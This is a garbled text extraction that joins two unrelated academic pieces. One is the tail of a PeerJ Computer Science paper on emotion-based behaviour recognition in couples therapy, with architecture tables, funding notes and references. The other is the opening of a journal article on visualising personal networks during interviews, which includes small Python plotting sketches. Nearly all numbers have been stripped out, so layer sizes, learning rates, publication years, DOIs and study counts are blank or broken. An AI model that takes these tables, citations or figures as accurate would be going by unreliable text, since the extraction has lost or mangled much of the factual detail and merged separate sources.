linear(in = , out = ) relu linear(in = , out = ) relu linear(in = , out = ) table a network architecture of ec. 
single-emotion classification network (ec) framework (input: * ; output: ) training details: adam optimizer(lr = e– ), crossentropyloss, batch size: ; ; conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu adaptivemaxpool d( ) linear(in = , out = ) relu linear(in = , out = ) relu pretrained linear(in = , out = ) prelu linear(in = , out = ) prelu linear(in = , out = ) trainable table a b-bp based context-dependent behavior recognition model framework. e-bp based context-dependent behavior recognition model (input: seq_len* ; output: ) training details: adam optimizer(lr = e– ) + polynomial learning rate decay, masked bcewithlogitsloss, batch size: emotion recognition framework pretrained gru(in_size = , hidden_size = , num_layers= ) linear(in = , out = ) relu trainable linear(in = , out = ) li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table a e-bp based context-dependent behavior recognition model framework. e-bp based context-dependent behavior recognition model (input: seq_len * * ; output: ) training details: adam optimizer(lr = e– ) + polynomial learning rate decay, masked bcewithlogitsloss, batch size: , epochs= conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu partly pretrained partly trainable conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu adaptivemaxpool d( ) gru(in_size = , hidden_size = , num_layers= ) linear(in = , out = ) relu linear(in = , out = ) trainable table a e-bp based reduced context-dependent behavior recognition model framework. those avgpool d layers are optional to adjust tem- poral receptive field size. e-bp based reduced context-dependent behavior recognition model (input: * seq_len ; output: ) training details: adam optimizer(lr = e– ) + polynomial learning rate decay, masked bcewithlogitsloss, batch size: , epochs= conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu behavior primitive embedding (pretrained) conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) avgpool d(kernel size= , stride= ) relu dropout(prob= . ) conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) avgpool d(kernel size= , stride= ) relu dropout(prob= . ) conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) avgpool d(kernel size= , stride= ) relu dropout(prob= . ) conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) avgpool d(kernel size= , stride= ) relu dropout(prob= . ) adaptivemaxpool d( ) linear(in = , out = ) relu linear(in = , out = ) relu linear(in = , out = ) trainable additional information and declarations funding this work was funded by the department of defense. the us army medical research acquisition activity is the awarding and administering acquisition office. this work was li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
supported by the office of the assistant secretary of defense for health affairs through the psychological health and traumatic brain injury research program under award no. w xwh- - - . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: department of defense. us army medical research acquisition activity. office of the assistant secretary of defense for health affairs: w xwh- - - . competing interests the authors declare there are no competing interests. author contributions • haoqi li conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • brian baucom analyzed the data, authored or reviewed drafts of the paper, approved the final draft. • panayiotis georgiou conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the code used in this work is available at https://bitbucket.org/georgiou/emotions_as_ primitives_towards_behavior_understanding. the couples therapy corpus involves human subjects participating in real couple therapy interactions and as such is protected under an institutional review board (irb). information on obtaining irb clearance and access to the corpus can be obtained by contacting the author: haoqi li, haoqili@usc.edu. references aldeneh z, provost em. . using regional saliency for speech emotion recognition. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . ambady n, rosenthal r. . thin slices of expressive behavior as predictors of interpersonal consequences: a meta-analysis. psychological bulletin ( ): – doi . / - . . . . anand n, verma p. . convoluted feelings convolutional and recurrent nets for detecting emotion from audio data. technical report. stanford university. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/georgiou/emotions_as_primitives_towards_behavior_understanding https://bitbucket.org/georgiou/emotions_as_primitives_towards_behavior_understanding mailto:haoqili@usc.edu http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /peerj-cs. baer js, wells ea, rosengren db, hartzler b, beadnell b, dunn c. . agency context and tailored training in technology transfer: a pilot evaluation of motiva- tional interviewing training for community counselors. journal of substance abuse treatment ( ): – doi . /j.jsat. . . . baumeister rf, dewall cn, vohs kd, alquist jl. . does emotion cause behavior (apart from making people do stupid, destructive things). in: then a miracle occurs: focusing on behavior in social psychological theory and research. new york: oxford university press, – . baumeister rf, vohs kd, nathan dewall c, zhang l. . how emotion shapes behavior: feedback, anticipation, and reflection, rather than direct causation. person- ality and social psychology review ( ): – doi . / . beale r, peter c. . affect and emotion in human-computer interaction. berlin/heidel- berg: springer. bengio y. . deep learning of representations for unsupervised and transfer learning. 
in: proceedings of icml workshop on unsupervised and transfer learning. – . bengio y, courville a, vincent p. . representation learning: a review and new perspectives. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . black m, katsamanis a, lee c-c, lammert ac, baucom br, christensen a, georgiou pg, narayanan ss. . automatic classification of married couples’ behavior using audio features. in: eleventh annual conference of the international speech communication association. black mp, katsamanis a, baucom br, lee c-c, lammert ac, christensen a, georgiou pg, narayanan ss. . toward automating a human behavioral coding system for married couples interactions using speech acoustic features. speech communication ( ): – doi . /j.specom. . . . burum ba, goldfried mr. . the centrality of emotion to psychological change. clinical psychology: science and practice ( ): – . busso c, narayanan ss. . the expression and perception of emotions: comparing assessments of self versus others. in: ninth annual conference of the international speech communication association. cabanac m. what is emotion? behavioural processes ( ): – doi . /s - ( ) - . carney dr, colvin cr, hall ja. . a thin slice perspective on the accuracy of first impressions. journal of research in personality ( ): – doi . /j.jrp. . . . carrillo f, mota n, copelli m, ribeiro s, sigman m, cecchi g, slezak df. . emotional intensity analysis in bipolar subjects. arxiv preprint. arxiv: . . chakravarthula sn, baucom b, narayanan s, georgiou p. . an analysis of observation length requirements in spoken language for machine understanding of human behaviors. arxiv preprint. arxiv: . . christensen a, atkins dc, berns s, wheeler j, baucom dh, simpson le. . traditional versus integrative behavioral couple therapy for significantly and li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jsat. . . http://dx.doi.org/ . / http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /j.specom. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jrp. . . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. chronically distressed married couples. journal of consulting and clinical psychology ( ): – doi . / - x. . . . chung j, gulcehre c, cho k, bengio y. . empirical evaluation of gated recurrent neural networks on sequence modeling. in: nips workshop on deep learning, december . collobert r, weston j, bottou l, karlen m, kavukcuoglu k, kuksa p. . natural language processing (almost) from scratch. journal of machine learning research (aug): – . cowie r, cornelius rr. . describing the emotional states that are expressed in speech. speech communication ( – ): – doi . /s - ( ) - . cowie r, douglas-cowie e, tsapatsoulis n, votsis g, kollias s, fellenz w, taylor jg. . emotion recognition in human-computer interaction. ieee signal processing magazine ( ): – doi . / . . cummins n, scherer s, krajewski j, schnieder s, epps j, quatieri tf. . a review of depression and suicide risk assessment using speech analysis. speech communication : – doi . /j.specom. . . . dunlop s, wakefield m, kashima y. . can you feel it? negative emotion, risk, and narrative in health communication. media psychology ( ): – doi . / . ekman p. a. are there basic emotions? psychological review ( ): – doi . / - x. . . . ekman p. b. an argument for basic emotions. cognition & emotion ( – ): – doi . / . el ayadi m, kamel ms, karray f. . 
survey on speech emotion recognition: fea- tures, classification schemes, and databases. pattern recognition ( ): – doi . /j.patcog. . . . feinberg me, kan ml, hetherington em. . the longitudinal influence of coparent- ing conflict on parental negativity and adolescent maladjustment. journal of marriage and family ( ): – doi . /j. - . . .x. georgiou pg, black mp, lammert ac, baucom br, narayanan ss. . ‘‘that’s aggra- vating, very aggravating’’: is it possible to classify behaviors in couple interactions using automatically derived lexical features? in: d’mello s, graesser a, schuller b, martin j-c, eds. affective computing and intelligent interaction. berlin: springer berlin, heidelberg, – . georgiou pg, black mp, narayanan ss. . behavioral signal processing for under- standing (distressed) dyadic interactions: some recent developments. in: proceedings of the joint acm workshop on human gesture and behavior understanding. acm, – . ghahremani p, babaali b, povey d, riedhammer k, trmal j, khudanpur s. . a pitch extraction algorithm tuned for automatic speech recognition. in: acoustics, speech and signal processing (icassp), ieee international conference on. ieee, – . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . /j.specom. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. ghosh pk, tsiartas a, narayanan s. . robust voice activity detection using long- term signal variability. ieee transactions on audio, speech, and language processing ( ): – doi . /tasl. . . gupta r, malandrakis n, xiao b, guha t, van segbroeck m, black m, potamianos a, narayanan s. . multimodal prediction of affective dimensions and depression in human-computer interactions. in: proceedings of the th international workshop on audio/visual emotion challenge. acm, – . han k, yu d, tashev i. . speech emotion recognition using deep neural network and extreme learning machine. in: fifteenth annual conference of the international speech communication association. heavey c, gill d, christensen a. . couples interaction rating system (cirs ). vol. . los angeles: university of california. heavey cl, christensen a, malamuth nm. . the longitudinal impact of demand and withdrawal during marital conflict. journal of consulting and clinical psychology ( ): – doi . / - x. . . . heyman re. . rapid marital interaction coding system (rmics). in: couple observational coding systems. routledge, – . heyman re, chaudhry br, treboux d, crowell j, lord c, vivian d, waters eb. . how much observational data is enough? an empirical test using marital interaction coding. behavior therapy ( ): – doi . /s - ( ) - . hoff e. . language development at an early age: learning mechanisms and outcomes from birth to five years. in: tremblay re, boivin m, peters rdev, rvachew s, eds. encyclopedia on early childhood development. available at http://www.child- encyclopedia.com/language-development-and-literacy/according-experts/language- development-early-age-learning. huang c-w, narayanan s. a. characterizing types of convolution in deep convo- lutional recurrent neural networks for robust speech emotion recognition. arxiv preprint. arxiv: . . huang c-w, narayanan ss. b. deep convolutional recurrent neural network with attention mechanism for robust speech emotion recognition. 
in: multimedia and expo (icme), ieee international conference on. ieee, – . jones j, christensen a. . couples interaction study: social support interaction rating system. vol. . los angeles: university of california. katsamanis a, black m, georgiou pg, goldstein l, narayanan s. . sailalign: robust long speech-text alignment. in: proc. of workshop on new tools and methods for very-large scale phonetics research. khorram s, jaiswal m, gideon j, mcinnis m, provost e-m. . the priori emotion dataset: linking mood to emotion detected in-the-wild. proc. interspeech – . kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tasl. . http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . /s - ( ) - http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. le d, provost em. . emotion recognition from spontaneous speech using hidden markov models with deep belief networks. in: automatic speech recognition and understanding (asru), ieee workshop on. ieee, – . lee j, tashev i. . high-level feature representation using recurrent neural network for speech emotion recognition. in: sixteenth annual conference of the international speech communication association. li h, baucom b, georgiou p. . sparsely connected and disjointly trained deep neural networks for low resource behavioral annotation: acoustic classification in couples’ therapy. in: proceedings of interspeech. san francisco,. li h, baucom b, georgiou p. . unsupervised latent behavior manifold learning from acoustic features: audio behavior. in: ieee international conference on acoustics, speech and signal processing (icassp). ieee, – . lim w, jang d, lee t. . speech emotion recognition using convolutional and recurrent neural networks. in: signal and information processing association annual summit and conference (apsipa), asia-pacific. ieee, – . lustgarten sd. . emerging ethical threats to client privacy in cloud communication and data storage. professional psychology: research and practice ( ): – doi . /pro . mao q, dong m, huang z, zhan y. . learning salient features for speech emotion recognition using convolutional neural networks. ieee transactions on multimedia ( ): – doi . /tmm. . . metallinou a, wollmer m, katsamanis a, eyben f, schuller b, narayanan s. . context-sensitive learning for enhanced audiovisual emotion classification. ieee transactions on affective computing ( ): – doi . /t-affc. . . mower e, narayanan s. . a hierarchical static-dynamic framework for emotion classification. in: acoustics, speech and signal processing (icassp), ieee international conference on. ieee, – . narayanan s, georgiou pg. . behavioral signal processing: deriving human behavioral informatics from speech and language. proceedings of the ieee ( ): – doi . /jproc. . . nasir m, baucom b, narayanan s, georgiou p. . towards an unsupervised entrainment distance in conversational speech using deep neural networks. arxiv preprint. arxiv: . . nasir m, baucom br, bryan cj, narayanan s, georgiou p. a. 
complexity in speech and its relation to emotional bond in therapist-patient interactions during suicide risk assessment interviews. in: proceedings of interspeech. stockholm, – . nasir m, baucom br, georgiou p, narayanan s. b. predicting couple ther- apy outcomes based on speech acoustic features. plos one ( ):e doi . /journal.pone. . nasir m, jati a, shivakumar pg, nallan chakravarthula s, georgiou p. . multi- modal and multiresolution depression detection from speech and facial landmark features. in: proceedings of the th international workshop on audio/visual emotion challenge. acm, – . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pro http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /t-affc. . http://dx.doi.org/ . /jproc. . http://arxiv.org/abs/ . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. oatley k, jenkins jm. . understanding emotions. hoboken: blackwell publishing. picard rw. . affective computing: challenges. international journal of human- computer studies ( – ): – doi . /s - ( ) - . povey d, ghoshal a, boulianne g, burget l, glembek o, goel n, hannemann m, motlicek p, qian y, schwarz p, silovsky j, stemmer g, vesely k. . the kaldi speech recognition toolkit. in: ieee workshop on automatic speech recognition and understanding, epfl-conf- . ieee signal processing society,. sander d, scherer k. . oxford companion to emotion and the affective sciences. oxford: oup oxford. schacter d, gilbert dt, wegner dm. . psychology ( nd edition). new york: worth. scherer kr. . what are emotions? and how can they be measured? social science information ( ): – doi . / . schlosberg h. . three dimensions of emotion. psychological review ( ): – doi . /h . schuller b, batliner a, steidl s, seppi d. . recognising realistic emotions and affect in speech: state of the art and lessons learnt from the first challenge. speech communication ( – ): – doi . /j.specom. . . . schuller b, rigoll g, lang m. . hidden markov model-based speech emotion recog- nition. in: acoustics, speech, and signal processing, . proceedings.(icassp’ ). ieee international conference on, vol. . ieee, ii– . schuller bw. . speech emotion recognition: two decades in a nutshell, benchmarks, and ongoing trends. communications of the acm ( ): – . sculley d, holt g, golovin d, davydov e, phillips t, ebner d, chaudhary v, young m, crespo j-f, dennison d. . hidden technical debt in machine learning systems. in: cortes c, lawrence nd, lee dd, sugiyama m, garnett r, eds. advances in neural information processing systems. vol. . curran associates, inc., – . soken nh, pick ad. . infants’ perception of dynamic affective expressions: do infants distinguish specific expressions? child development ( ): – doi . / - . . soltau h, liao h, sak h. . neural speech recognizer: acoustic-to-word lstm model for large vocabulary speech recognition. in: proc. interspeech . – . spector pe, fox s. . an emotion-centered model of voluntary work behavior: some parallels between counterproductive work behavior and organizational citizenship behavior. human resource management review ( ): – doi . /s - ( ) - . srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . stasak b, epps j, cummins n, goecke r. . an investigation of emotional speech in depression classification. in: proceedings of interspeech. – . tanaka t, yamamoto t, haruno m. . 
brain response patterns to economic inequity predict present and future depression indices. nature human behaviour ( ): – doi . /s - - - . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /h http://dx.doi.org/ . /j.specom. . . http://dx.doi.org/ . / - . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. tao j, tan t. . affective computing: a review. in: international conference on affective computing and intelligent interaction. berlin, heidelberg: springer berlin heidelberg, – . tong e, zadeh a, jones c, morency l-p. . combating human trafficking with multimodal deep models. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), vol. . – . torrey l, shavlik j. . transfer learning. in: handbook of research on machine learning applications and trends: algorithms, methods, and techniques. hershey, pennsylvania: igi global, – . tseng s-y, baucom b, georgiou p. . unsupervised online multitask learning of behavioral sentence embeddings. arxiv preprint. arxiv: . . tseng s-y, chakravarthula sn, baucom b, georgiou p. . couples behavior modeling and annotation using low-resource lstm language models. in: proceedings of interspeech. san francisco. venek v, scherer s, morency l-p, rizzo a, pestian j. . adolescent suicidal risk assessment in clinician-patient interaction. ieee transactions on affective computing ( ): – doi . /taffc. . . vinciarelli a, pantic m, bourlard h. . social signal processing: survey of an emerging domain. image and vision computing ( ): – doi . /j.imavis. . . . wöllmer m, metallinou a, eyben f, schuller b, narayanan s. . context-sensitive multimodal emotion recognition from speech and facial expression using bidirec- tional lstm modeling. in: proc. interspeech , makuhari, japan. – . zadeh ab. . cmu-multimodalsdk. github. available at https://github.com/ a zadeh/cmu-multimodalsdk (accessed on march ). zadeh ab, liang pp, poria s, cambria e, morency l-p. . multimodal language analysis in the wild: cmu-mosei dataset and interpretable dynamic fusion graph. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), vol. . – . zheng w, yu j, zou y. . an experimental study of speech emotion recognition based on deep convolutional neural networks. in: affective computing and intelligent interaction (acii), international conference on. ieee, – . li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /taffc. . http://dx.doi.org/ . /j.imavis. . . https://github.com/a zadeh/cmu-multimodalsdk https://github.com/a zadeh/cmu-multimodalsdk http://dx.doi.org/ . /peerj-cs. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). issue | vol. article | doi: . /connections- - what the eye does not see: visualizations strategies for the data collection of personal networks isidro maya-jariego* and romina cachia universidad de sevilla, seville, spain. this paper was edited by eric quintane. *e-mail: isidromj@us.es received for publication january , . abstract the graphic representation of relational data is one of the central el- ements of social network analysis. 
in this paper, the author describe the use of visualization in interview-based data collection procedures designed to obtain personal networks information, exploring four main contributions. first, the author shows a procedure by which the visualization is integrated with traditional name generators to facili- tate obtaining information and reducing the burden of the interview process. second, the author describes the reactions and qualitative interpretation of the interviewees when they are presented with an analytical visualization of their personal network. the most frequent strategies consist in identifying the key individuals, dividing the per- sonal network in groups and classifying alters in concentric circles of relative importance. next, the author explores how the visualiza- tion of groups in personal networks facilitates the enumeration of the communities in which individuals participate. this allows the author to reflect on the role of social circles in determining the structure of personal networks. finally, the author compares the graphic rep- resentation obtained through spontaneous, hand-drawn sociograms with the analytical visualizations elicited through software tools. this allows the author to demonstrate that analytical procedures reveal aspects of the structure of personal networks that respondents are not aware of, as well as the advantages and disadvantages of using both modes of data collection. for this, the author presents findings from a study of highly skilled migrants living in spain (n = ) through which the author illustrates the challenges, in terms of data reliability, validity and burden on both the researcher and the participants. keywords visualization, personal networks, social support, analytical proce- dures, meaning. network visualizations graphic representation of relational data is one of the central elements of social network analysis (freeman, ). jacob levy moreno produced the first soci- ograms in the s and over the years, they have evolved from ad hoc drawings to sophisticated visu- alizations, largely due to the new possibilities offered by computer and software development (freeman, ; moreno, ). since their inception, visualiza- tions have been integrated in social network analysis in creative ways (freeman, ; hogan et al., ; ryan and d’angelo, ). however, the use of visual- izations to depict already collected data has predomi- nated. such visualizations tend to be used to observe systematically the relations data and to detect emer- gent properties that may only be visible through the structure of the network. visualizations are commonly connections what the eye does not see: visualizations strategies for the data collection of personal network used to discover two kinds of patterns: social groups – a group of nodes highly linked to each other – and social positions – a group of nodes who are linked in the social system in similar ways (freeman, ). only recently has the application of visualization during data collection begun to be used (carrasco et al., ; hogan et al., ; maya jariego and holgado, ; mccarty and govindaramanujam, ; mccarty et al., ; schiffer and hauck, ). there are instances where a network vis- ualization is developed during the data collection with the help of the respondents who collaborate and work together through a collective effort. thus, through the use of participatory tools to elaborate sociograms, participants make “implicit knowledge about networks of influences explicit” (schiffer and hauck, , p. 
), apart from allowing the detec- tion of conflicting goals and areas with potential for cooperation. in this paper, we explore the contributions of visu- alizations when collecting personal network data, as well as its use to elicit the qualitative interpretation of individuals about their personal networks. according- ly, we show that the graphic representation of rela- tionships can be used in an innovative way to collect data from personal networks, both to obtain concrete information about relationships (i.e. ties and alters) and in the qualitative interpretation of interaction con- texts by the informants themselves. in the context of personal networks, most data is based on respondents reporting on the own relation of their ties (mccarty and govindaramanujam, ). visualizations are unique in providing an interactive tool for data collection, which may vary from a paper and pencil network visualization to more sophisticat- ed technological programs to gather this kind of data. along the past two decades, a number of software packages with an incorporated visual interface were developed making the use of visualizations during data collection possible. the added value of visualization has been fre- quently sought in elements that go beyond the an- alytical representation of information. for example, it has been found that the hand drawings of the per- sonal network reveal the perception of the social world by individuals (mccarty et al., ); the tech- nique called “net-map,” based on a participatory strategy, is used in the construction of a community sociogram, following a group consensus-evaluation process (maya-jariego, , schiffer and hauck, ); and egoweb has been used to maximize the differentiation of groups, which allows the identifica- tion of the social circles in which the individual partici- pates (mccarty and govindaramanujam, ). visualizations often provide a narrative to the net- work. the structure and composition of the network are very hard to read through a matrix, especially dur- ing data collection. in contrast, graphic representa- tions can be very efficient tools which enable both the researcher and the interviewee to see how the alters are connected visually, hence adding another layer of information during data collection, which would be ig- nored through a matrix. they may also be useful in depicting a wider variety of information that could be utilized to probe participants, bringing them into fur- ther discussion on their networks. for example, dis- cussing why certain nodes are isolated from the rest of the network. nevertheless, using this mode of data collection poses various challenges to the research- ers, in terms of data reliability, validity and the added burden on both the researcher and the participants (bastian et al., ). generating personal networks through visualizations personal networks may vary in size from as small as to s or even s of individuals (killworth et al., ; mccarty et al., ; pool and kochen, ; roberts et al., ). there is no clear bounda- ry delineating personal networks except the objective of the study in question (fu, ), although limiting the number to a reliable subset of alters has been a major concern in personal network analysis. the se- lection is based on a trade-off between an efficient data collection process and achieving the most accu- rate representation of respondents’ personal network based on the objective of the study (bidart and char- bonneau, ). 
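to illustrate why a drawn sociogram is easier to read than a matrix while data is still being collected, the following minimal sketch converts an adjacency matrix recorded during an interview into a drawable graph. the alter names and ties are hypothetical, and python with the networkx and matplotlib libraries is an assumption made here for illustration; it is not software used in the studies discussed.

```python
# Minimal sketch with hypothetical data: converting an interview adjacency
# matrix into a sociogram that can be drawn and inspected on the spot.
import networkx as nx
import matplotlib.pyplot as plt

alters = ["ana", "luis", "marta", "ken", "paula"]   # hypothetical names from a generator
matrix = [                                          # 1 = the two alters know each other
    [0, 1, 1, 0, 0],
    [1, 0, 1, 0, 0],
    [1, 1, 0, 0, 1],
    [0, 0, 0, 0, 1],
    [0, 0, 1, 1, 0],
]

g = nx.Graph()
g.add_nodes_from(alters)
for i in range(len(alters)):
    for j in range(i + 1, len(alters)):
        if matrix[i][j]:
            g.add_edge(alters[i], alters[j])

# Ego is left out of the picture, because ego is tied to every alter by definition.
nx.draw_networkx(g, node_color="lightgray")
plt.axis("off")
plt.show()
```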
over the years, distinct methods on how to elic- it personal networks and social support networks of people have been elaborated (agneessens et al., ; barrera, ; bidart and charbonneau, ; fischer, ; marin and hampton, ; mccallister and fischer, ), whereby the main tool used is a name generator. comparatively, it has been less com- mon to use network visualizations to gather data on personal and social support networks (hogan et al., ; kahn and antonucci, ), although it was proposed as an efficient strategy to give meaning to the contexts of interaction of the individuals (maya jariego and holgado, ). data on personal networks is typically collected in three stages: name generator, dyad relation between the alters (completing an adjacency matrix) and name interpreters. for each stage, different methods have been developed to elicit the data, varying from pa- per methods to computer-aided programs or a mix connections of both. network visualizations can be used in all of the three stages, whether to collect data or illustrate results (tubaro et al., ). generating names with the support of visualization techniques researchers have used different visual aids and tech- niques to enable respondents enumerate their con- tacts. free-hand spontaneous drawings have been used since the origin of personal networks visuali- zations. free-hand drawings are easy to use, cheap, provide additional information that could be essential in the interpretation of the network through discus- sion and are less prone to technical failure (cheong et al., ). they are also easy to modify during the interview using pencil (hogan et al., ). at times, they have been used as an alternative technique to gather information, as in a study with immigrant chil- dren, where due to the diverse ethnic backgrounds, many of the respondents did not speak, read or write the language of the host country (den besten, ). researchers opting for this approach either leave the interviewees to draw their networks with hardly any instructions or have opted for giving some basic in- structions, so as to maintain some homogeneity be- tween the maps. a second version of this type of spontaneous rep- resentation may be acquired through the use of cards and other props to represent the actors and their power. next, the relationships between actors are drawn. this process is usually carried out in a group, in a participatory manner, and is a way to show a shared vision about relationships in the community (schiffer and hauck, ). despite the differences in format, it is also a creative and spontaneous descrip- tion, without restrictions, of the social network. another common technique is concentric circles hierarchical mapping, whereby concentric circles of different sizes are used to provide a visual guide to interviewees in organizing their alters according to their closeness to ego, who tends to be placed at the center (antonucci, ; carrasco et al., ; ho- gan et al., ). the number of concentric circles depends on the researcher. in previous research, we have observed the number varying from as little as to up to (cheong et al., ; hersberger, ). this approach is sometimes combined with other visual aids, such as dividing the concentric circles into quadrants to gather other type of information (ryan and d’angelo, ); or the use of post-it notes which allows movability and reassessment of certain metrics on the same network (hogan et al., ). an online version has also been tried by tubaro et al. 
( ), whereby respondents drew their sociogram on- line, an approach that according to the authors could be useful to study hidden or sensitive populations. the use of concentric circles is easy to prepare, appli- cable to a variety of respondents (samuelsson et al., ) and depending on how you design it, may add network structural data (mccarty et al., ). none- theless, some respondents may find it challenging and confusing given it restricts them to a structure that they may not be comfortable when depicting their personal network (ryan et al., ). location maps have also been used as visual aides to understand movement of people. in a study using geo-referencing cell phone activity, maps were used to show population flows estimated every hour within an urban environment (ratti et al., ). in an- other study, maps were used to illustrate where com- munity residents interacted in the city and the people they met in daily interactions (pearce and milne, ). finally, another very simple way to generate names is to provide different boxes in which respondents can group alters according to different categories. name boxed may be limited by a number, or provided as an open list; and the names obtained are some- times transferred to another type of visualization. the number of names mentioned may be influenced by the number of boxes listed in the questionnaire, with exposure to a larger amount of boxes leading to more alternatives (vehovar et al., ). the characteristics and advantages of these four strategies for obtaining names and relationships are summarized in table . establishing relations between alters with the support of visualization techniques in order to gather data on the structure of the net- work, apart from the relation of each alter with ego, the researcher needs to gather data on the relation for each possible alter dyad. the adjacency matrix is the tool most commonly used for such purposes. this second stage of data collection is where the most benefits of using data visualizations are possi- bly noted. for example, with alters interviewees have to go through possible relations and hence, doing this in a document or a screen with rows and columns is much more burdensome. in fact, network researchers have recently experimented with some innovations in this area. using visualizations, as alternative to the adja- cency matrix, respondents are engaged in a process where slowly they are unveiling their own network. the emergent visible network is a result, which tends to give immediate gratification to the respondents, especially if it is the first time they see their own net- what the eye does not see: visualizations strategies for the data collection of personal network work visualization. it provides an interactive tool which beyond making relations visible, enables both the re- searcher and the participant to delve deeper when trying to understand and interpret the data (moreno, ). participants tend to attempt spontaneously to justify or interpret why their sociogram looks like it does, providing an additional layer of information dur- ing the interview. in the context of migration, it allows researchers to decipher the temporal and spatial dy- namics of patterns of change (ryan and d’angelo, ). on the downside, respondents may also feel exposed, and this could create some tension during the interview (ryan et al., ). 
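to make the size of this task concrete: with n alters there are n(n-1)/2 dyads to evaluate. the sketch below enumerates every pair exactly once, which is the same systematic pass that either a matrix or a visual interface has to guarantee. the alter names, the example size of 25 and the stand-in question function are hypothetical and are not taken from the study.

```python
# Illustrative sketch: asking the tie question once per alter dyad.
# With 25 alters (a hypothetical size) there are 25 * 24 / 2 = 300 dyads.
from itertools import combinations

def ask_respondent(a, b):
    """Stand-in for the interview question ('would these two greet each other
    in ego's absence?'); here it simply simulates an answer."""
    return (len(a) + len(b)) % 3 == 0

alters = [f"alter_{i}" for i in range(1, 26)]
dyads = list(combinations(alters, 2))
print(len(dyads))                                   # -> 300 dyads to cover

ties = [(a, b) for a, b in dyads if ask_respondent(a, b)]
# The tie list is equivalent to the upper triangle of the adjacency matrix.
```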
obtaining name interpreters with visualization techniques
network visualization may also be used to gather data on name interpreters, which are aimed at providing additional information on the alters listed. most researchers gather data on the network composition, collecting socio-demographic information as well as evaluative data. again in this case, the use of visualization not only makes the data collection more interactive and, hence, less burdensome, but also, if planned adequately, it can effectively accelerate the collection phase. in the context of mobility, researchers have shown particular interest in gathering evaluative data that could enable the interpretation of the network. for instance, regarding the alters of a mobile individual, it is relevant to know the place where they reside, the time they have spent in the location, the frequency of contact and the duration of the tie with ego, amongst other factors (cachia and maya jariego, ; domínguez and maya-jariego, ; lubbers et al., ; ryan and d'angelo, ).

table . four visualization displays for gathering data on personal networks.
display | description | advantages
free-hand spontaneous drawing | respondents draw their network on a blank paper or a screen, with little instruction. sometimes other aides, such as post-it notes, figures or colored markers, are used. also applied in groups. | easy to prepare and set up. allows participants to be creative. prompts qualitative discourse. less prone to technical failure. useful when language may be a problem.
concentric circles | several concentric circles differing in size are used to guide the respondent in placing alters in different circles, around ego. | easy to set up and easy to use. good summary of complex relations. captures the psychological value of relationships. adds structural data.
location maps | respondents use real maps to depict movement within a given location or to identify significant places within a location. | maps are easy to use and respondents do not need much instruction on how to use them. particularly useful for studies on mobility, migration, community behavior settings, etc.
